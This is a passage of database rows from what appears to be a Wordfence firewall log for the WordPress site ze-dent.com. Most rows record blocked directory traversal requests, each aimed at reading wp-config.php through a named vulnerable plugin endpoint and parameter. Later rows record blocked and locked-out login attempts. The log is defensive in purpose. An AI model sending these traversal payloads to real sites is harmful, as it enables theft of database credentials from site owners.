(5234, 1595955796.391820, 1595955796.372000, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=..%2F..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd2Zsb2Nd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kenMtdmlkZW9nYWxsZXJ5L2RlcGxveS9kZXNpZ25lci9wcmV2aWV3LnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5235, 1595955796.270660, 1595955796.251100, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/dukapress/lib/dp_image.php?src=..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzcmNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kdWthcHJlc3MvbGliL2RwX2ltYWdlLnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5236, 1595955796.136351, 1595955796.117500, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tTRUNVUklUWV9GSUxFXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kbS1hbGJ1bXMvdGVtcGxhdGUvYWxidW0ucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5237, 1595955795.998197, 1595955795.979000, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/dm-albums/dm-albums.php?download=yes&file=..%2F..%2F..%2Fwp-config.php&currdir=%2Fwp-content%2Fplugins%2Fdm-albums%2F', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kbS1hbGJ1bXMvZG0tYWxidW1zLnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5238, 1595955795.914635, 1595955795.895000, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/disclosure-policy-plugin/functions/action.php?delete=asdf&blogUrl=asdf&abspath=..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thYnNwYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kaXNjbG9zdXJlLXBvbGljeS1wbHVnaW4vZnVuY3Rpb25zL2FjdGlvbi5waHA=\",\"category\":\"lfi\",\"ssl\":0}'),
(5239, 1595955795.769039, 1595955795.748300, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/db-backup/download.php?file=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kYi1iYWNrdXAvZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5240, 1595955795.638112, 1595955795.617400, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/crayon-syntax-highlighter/util/ajax.php?wp_load=..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t3cF9sb2FkXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jcmF5b24tc3ludGF4LWhpZ2hsaWdodGVyL3V0aWwvYWpheC5waHA=\",\"category\":\"lfi\",\"ssl\":0}'),
(5241, 1595955795.507428, 1595955795.487800, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jbG91ZHNhZmUzNjUtZm9yLXdwL2FkbWluL2VkaXRvci9jczM2NV9lZGl0LnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5242, 1595955795.395471, 1595955795.360000, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlTmFtZV0=\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jYW5kaWRhdGUtYXBwbGljYXRpb24tZm9ybS9kb3dubG9hZHBkZmZpbGUucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5243, 1595955795.259400, 1595955795.217400, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/brandfolder/callback.php?wp_abspath=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t3cF9hYnNwYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9icmFuZGZvbGRlci9jYWxsYmFjay5waHA=\",\"category\":\"lfi\",\"ssl\":0}'),
(5244, 1595955795.149461, 1595955795.106200, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/bookx/includes/bookx_export.php?file=..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9ib29reC9pbmNsdWRlcy9ib29reF9leHBvcnQucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5245, 1595955795.037681, 1595955794.988000, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hc3Bvc2UtZG9jLWV4cG9ydGVyL2FzcG9zZV9kb2NfZXhwb3J0ZXJfZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5246, 1595955794.872010, 1595955794.826500, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hc3Bvc2UtY2xvdWQtZWJvb2stZ2VuZXJhdG9yL2FzcG9zZV9wb3N0c19leHBvcnRlcl9kb3dubG9hZC5waHA=\",\"category\":\"lfi\",\"ssl\":0}'),
(5247, 1595955794.714184, 1595955794.671500, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/apptha-slider-gallery/asgallDownload.php?imgname=..%2F..%2F..%2Fwp-load.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal', '{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWduYW1lXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtbG9hZC5waHA=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcHB0aGEtc2xpZGVyLWdhbGxlcnkvYXNnYWxsRG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5248, 1595955794.603730, 1595955794.561200, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/annonces/includes/lib/photo/uploadPhoto.php?abspath=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thYnNwYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hbm5vbmNlcy9pbmNsdWRlcy9saWIvcGhvdG8vdXBsb2FkUGhvdG8ucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5249, 1595955794.474657, 1595955794.430500, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php?abspath=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thYnNwYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hbGx3ZWJtZW51cy13b3JkcHJlc3MtbWVudS1wbHVnaW4vYWN0aW9ucy5waHA=\",\"category\":\"lfi\",\"ssl\":0}'),
(5250, 1595955794.361915, 1595955794.325500, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tkb3dubG9hZF9maWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hamF4LXN0b3JlLWxvY2F0b3Itd29yZHByZXNzXzAvc2xfZmlsZV9kb3dubG9hZC5waHA=\",\"category\":\"lfi\",\"ssl\":0}'),
(5251, 1595955794.257813, 1595955794.216300, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tkZXdfZmlsZV0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hZHZhbmNlZC1kZXdwbGF5ZXIvYWRtaW4tcGFuZWwvZG93bmxvYWQtZmlsZS5waHA=\",\"category\":\"lfi\",\"ssl\":0}'),
(5252, 1595955794.121908, 1595955794.102400, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/advanced-custom-fields/core/actions/export.php?acf_abspath=..%2F..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thY2ZfYWJzcGF0aF0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hZHZhbmNlZC1jdXN0b20tZmllbGRzL2NvcmUvYWN0aW9ucy9leHBvcnQucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5253, 1595955793.957011, 1595955793.913900, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/abtest/abtest_admin.php?action=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thY3Rpb25d\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hYnRlc3QvYWJ0ZXN0X2FkbWluLnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5254, 1595955793.797326, 1595955793.756800, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/Enigma2.php?boarddir=..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tib2FyZGRpcl0=\",\"paramValue\":\"Li4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9FbmlnbWEyLnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5255, 1595955793.689200, 1595955793.646400, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tia3B3cF9wbHVnaW5fcGF0aF0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9CYWNrVXAvQXJjaGl2ZS9Xcml0ZXIucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5256, 1595955793.520700, 1595955793.471300, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tia3B3cF9wbHVnaW5fcGF0aF0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9CYWNrVXAvQXJjaGl2ZS9SZWFkZXIucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5257, 1595955793.340510, 1595955793.297500, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tia3B3cF9wbHVnaW5fcGF0aF0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9CYWNrVXAvQXJjaGl2ZS9QcmVkaWNhdGUucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5258, 1595955793.212866, 1595955793.167600, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/BackUp/Archive.php?bkpwp_plugin_path=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tia3B3cF9wbHVnaW5fcGF0aF0=\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9CYWNrVXAvQXJjaGl2ZS5waHA=\",\"category\":\"lfi\",\"ssl\":0}'),
(5259, 1595955793.099429, 1595955793.055500, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/force-download.php?file=..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvZm9yY2UtZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5260, 1595955792.987010, 1595955792.942100, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-admin/edit.php?post_type=wd_ads_ads&export=export_csv&path=..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2VkaXQucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5261, 1595955792.874287, 1595955792.829300, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-admin/edit.php?page=wp-db-backup.php&backup=..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tiYWNrdXBd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2VkaXQucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5262, 1595955792.721800, 1595955792.677100, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-admin/admin.php?page=newsletters-history&wpmlmethod=exportdownload&file=..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5263, 1595955792.548263, 1595955792.503100, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=..%2Fwp-config.php&order=name&srt=yes', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpdGVtXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5264, 0.000000, 1595959746.227259, 0x00000000000000000000ffff224ca5e3, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://www.cohendentrepair.com/user/', 'Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.12', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5265, 0.000000, 1595962732.968945, 0x00000000000000000000ffffb956a46f, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5266, 0.000000, 1595969781.995807, 0x00000000000000000000ffffb00a68f0, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5267, 0.000000, 1595971503.410487, 0x00000000000000000000ffffb956a465, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5268, 0.000000, 1595977889.709519, 0x00000000000000000000ffffb955eef4, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5269, 0.000000, 1595989626.271377, 0x00000000000000000000ffffb956a468, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5270, 0.000000, 1595998159.825655, 0x00000000000000000000ffffb956a467, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5271, 0.000000, 1596004355.380988, 0x00000000000000000000ffffb955efc3, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5272, 1596005789.612511, 1596005789.499300, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(5273, 1596008580.817557, 1596008580.700500, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
